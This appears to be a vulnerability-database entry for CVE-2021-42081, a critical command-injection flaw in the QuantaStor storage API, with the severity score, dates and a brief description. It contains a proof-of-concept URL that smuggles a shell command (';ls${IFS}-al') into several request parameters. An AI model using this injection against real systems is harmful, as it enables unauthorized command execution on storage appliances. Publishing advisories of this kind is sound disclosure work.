VYPR
Critical severity9.1NVD Advisory· Published Jul 10, 2023· Updated Jun 17, 2026

CVE-2021-42081

CVE-2021-42081

Description

An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.

POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

2

Patches

Vulnerability mechanics

References

5

News mentions

0

No linked articles in our index yet.